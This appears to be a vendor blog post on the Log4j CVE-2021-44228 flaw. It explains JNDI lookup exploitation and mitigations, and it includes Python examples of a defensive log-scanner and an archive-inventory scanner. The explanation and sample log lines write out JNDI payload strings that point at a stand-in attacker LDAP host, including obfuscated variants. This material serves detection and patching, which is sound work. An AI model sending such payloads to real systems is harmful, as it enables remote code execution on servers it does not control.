Last Friday morning NCSC/GovCERT.ch reported a newly discovered zero-day vulnerability, rated CVSS 10.0 (critical), in the popular Java library "Log4j", a logging framework used by a large number of Java web and server applications (and by applications written in other JVM languages).

The 0-day was tweeted along with a proof of concept (POC) posted on GitHub. It has since been assigned CVE-2021-44228.

According to Cisco, the vulnerability affects a broad range of server-side services and applications, which makes it extremely dangerous and makes updating those applications urgent.

Exploitability is not uniform, however: a product may ship a vulnerable Log4j version without every instance being exploitable, because a successful attack depends on several pre- and post-conditions, such as the JVM in use (recent JVM releases refuse to load classes from a remote LDAP codebase by default, which blocks the simplest exploit path but not every one), the actual logging configuration, and whether attacker-controlled input reaches a log statement at all. Every Log4j 2 release from 2.0 through 2.14.1 is affected.

Recording of an Acronis webinar that took place on 16 December 2021 in the wake of widespread attacks enabled by the log4j vulnerability in Java applications and services.

How the exploit works

As the Swiss Government Computer Emergency Response Team (GovCERT.ch) explained, the vulnerability stems from how Log4j processes log messages: before a message is written, Log4j evaluates lookup expressions of the form ${...} embedded in it. If an attacker gets a specially crafted string such as ${jndi:ldap://rogueldapserver.com/a} into any value that ends up being logged (a User-Agent header, a username, a search term), Log4j performs a JNDI lookup against the attacker's LDAP server. That server can answer with a reference to a remote Java class, which the JVM then loads and runs, giving the attacker Remote Code Execution (RCE).
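To make the mechanism concrete, here is a small Python model of Log4j's message-lookup substitution. It is an added example written for this post, not code from Log4j or from GovCERT.ch; the lookups it understands (lower, upper, the ${name:-default} syntax and jndi) are a deliberately reduced subset, the JNDI fetch is only recorded rather than performed, and the access-log lines at the bottom are constructed. It shows three things the paragraph above only states: how the crafted string turns into an LDAP URL, how nested lookups hide the word "jndi" from a naive string filter, and why logging the message verbatim (lookups disabled) ends the chain.

```python
"""
Toy model of Log4j 2 message-lookup substitution (added example, not code from
Log4j or from the original post). The JNDI fetch is only recorded, never made.
"""
import re
from typing import List, Tuple

# Innermost ${...} first: the body may not contain braces or another "${".
_LOOKUP = re.compile(r"\$\{((?:[^${}]|\$(?!\{))*)\}")
# Lookups the toy understands; real Log4j has many more (env, sys, java, date, ...).
_KNOWN = re.compile(r"^(lower|upper|jndi):(.*)$", re.IGNORECASE | re.DOTALL)


def _evaluate(expr: str, fetched: List[str]) -> str:
    """Evaluate one lookup roughly the way Log4j's StrSubstitutor would."""
    m = _KNOWN.match(expr)
    if m:
        prefix, body = m.group(1).lower(), m.group(2)
        if prefix == "lower":
            return body.lower()
        if prefix == "upper":
            return body.upper()
        # jndi: real Log4j hands this URL to JNDI; an attacker's LDAP server
        # can answer with a reference to a remote class the JVM loads and runs.
        fetched.append(body)
        return "<jndi-result>"
    if ":-" in expr:
        # ${name:-default}: an unset name yields the default. Attackers use
        # ${::-j} to spell "jndi" one character at a time.
        return expr.split(":-", 1)[1]
    return "${" + expr + "}"  # unknown lookup is left in place


def resolve_lookups(message: str, lookups_enabled: bool = True) -> Tuple[str, List[str]]:
    """Return (formatted message, JNDI URLs that would have been fetched).

    lookups_enabled=False models log4j2.formatMsgNoLookups=true (2.10+) or a
    %m{nolookups} pattern: the message is logged verbatim.
    """
    fetched: List[str] = []
    if not lookups_enabled:
        return message, fetched
    text = message
    for _ in range(64):  # bound the nesting depth; Log4j caps it too
        new = _LOOKUP.sub(lambda m: _evaluate(m.group(1), fetched), text)
        if new == text:
            break
        text = new
    return text, fetched


def find_jndi_lines(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Scan log lines; return (line number, JNDI URL) for every line that would
    trigger a lookup once fully resolved, including obfuscated variants."""
    hits: List[Tuple[int, str]] = []
    for no, line in enumerate(log_lines, 1):
        _, fetched = resolve_lookups(line)
        hits.extend((no, url) for url in fetched)
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 "GET / HTTP/1.1" 200 "${jndi:ldap://rogueldapserver.com/a}"',
    '203.0.113.9 "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://rogueldapserver.com/b}"',
    '203.0.113.9 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${lower:LDAP}://rogueldapserver.com/c}"',
    '203.0.113.7 "GET /order?id=${unknown:42} HTTP/1.1" 200 "curl/7.81"',
]

if __name__ == "__main__":
    for no, url in find_jndi_lines(SAMPLE_LOG):
        print(f"line {no}: would fetch {url}")
    raw, fetched = resolve_lookups(SAMPLE_LOG[1], lookups_enabled=False)
    print("with lookups disabled:", raw, fetched)
```

Lines 3 and 4 of the sample log contain no literal "jndi" substring, yet both resolve to the same LDAP fetch as line 2; that is why a signature that greps access logs or WAF traffic for `${jndi:` alone misses traffic, and why resolving the lookups before matching (as this scanner does) is the more reliable check.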

(Graphic: how to prevent the Log4j zero-day exploit, according to govcert.ch)

Mitigations

Make sure you have the server owner's permission before running any penetration test. To detect a vulnerable endpoint, send a lookup payload whose JNDI URL points at a hostname you control and watch for the resulting DNS query; a free, open-source service such as CanaryTokens.org gives you a unique hostname and alerts you when it is resolved.

Limit your exposure to future attacks

Get an overview of which systems and software in your environment use Log4j, then prioritise internet-facing services and follow the vendors' update instructions. Where an immediate update is not possible, a known workaround for 2.10 through 2.14.1 is to set the JVM property log4j2.formatMsgNoLookups=true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true); for older 2.x releases, remove the JndiLookup class from the log4j-core jar.
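The inventory step is the one most teams struggled with, because log4j-core is often buried inside application archives rather than installed as a package. The following Python scanner is an added example (not code from the post, GovCERT.ch or any vendor tool): it walks a directory tree, opens every .jar, .war and .ear, reads the Maven pom.properties that log4j-core ships with to obtain the version, and checks whether JndiLookup.class is still present, recursing into archives nested inside .war/.ear files. The demo function builds constructed fixture archives in a temporary directory; the affected range it uses is the 2.0 through 2.14.1 range stated above.

```python
"""
Log4j 2 inventory scanner for a filesystem (added example; not code from the
original post, GovCERT.ch or any vendor tool). Scans .jar/.war/.ear archives,
including archives nested inside other archives, and reports log4j-core
findings. The demo at the bottom runs against constructed fixtures.
"""
import io
import os
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear")
# Affected range for CVE-2021-44228 as given in the post: 2.0 through 2.14.1.
# Caveat: the later backport releases 2.12.2 and 2.3.1 are patched but fall
# inside this simple range; treat hits on those versions as manual follow-ups.
FIXED_FROM = (2, 15, 0)


def parse_version(v: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0) (qualifier dropped)."""
    core = v.split("-", 1)[0]
    return tuple(int(p) for p in core.split(".") if p.isdigit())


def is_affected(version: str) -> bool:
    return (2, 0) <= parse_version(version) < FIXED_FROM


def inspect_archive(data: bytes, name: str, results: List[Dict]) -> None:
    """Record log4j-core findings for one archive; recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version: Optional[str] = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_CLASS in names
        if version or has_jndi:
            results.append({
                "archive": name,
                "file": os.path.basename(name),
                "version": version,
                "jndi_lookup_present": has_jndi,
                # Exploitable only if JndiLookup.class is still there (removing it
                # is a known workaround) and the version is in range; a jar with
                # the class but no readable version is flagged for manual review.
                "vulnerable": has_jndi and (version is None or is_affected(version)),
            })
        for member in sorted(names):
            if member.lower().endswith(ARCHIVE_EXT):
                inspect_archive(zf.read(member), f"{name}!{member}", results)


def scan_tree(root: str) -> List[Dict]:
    """Scan every archive below root; findings sorted by archive path."""
    results: List[Dict] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), path, results)
    return sorted(results, key=lambda r: r["archive"])


def make_fake_jar(version: str, with_jndi: bool) -> bytes:
    """Constructed fixture: a minimal jar holding only the entries we inspect."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a real class
    return buf.getvalue()


def demo() -> List[Dict]:
    """Scan a temporary tree of constructed fixtures and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = os.path.join(tmp, "app", "lib")
        os.makedirs(lib)
        with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as fh:
            fh.write(make_fake_jar("2.14.1", True))            # vulnerable
        with open(os.path.join(lib, "log4j-core-2.14.1-patched.jar"), "wb") as fh:
            fh.write(make_fake_jar("2.14.1", False))           # JndiLookup.class removed
        war = io.BytesIO()                                     # nested inside a .war
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", make_fake_jar("2.15.0", True))
        with open(os.path.join(tmp, "app", "shop.war"), "wb") as fh:
            fh.write(war.getvalue())
        return scan_tree(tmp)


if __name__ == "__main__":
    for r in demo():
        print(f'{r["archive"]}: version={r["version"]} vulnerable={r["vulnerable"]}')
```

Point scan_tree at an application server's installation directory (and at any container image layers you have unpacked) rather than at the whole root to keep the run short; the nested-archive handling matters because a single .war or fat jar can carry its own copy of log4j-core that a package manager knows nothing about.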

SophosLabs has already deployed a number of IPS signatures that detect traffic attempting to exploit the Log4j vulnerability. The Sophos Managed Threat Response (MTR) team is actively monitoring MTR customer accounts for post-exploitation activity, and Sophos XDR customers can use a query to identify vulnerable Log4j components in their environment.

Our DaaS platform has already been patched and our BaaS providers have secured their platforms. We will continue to follow how Log4j affects the industry.
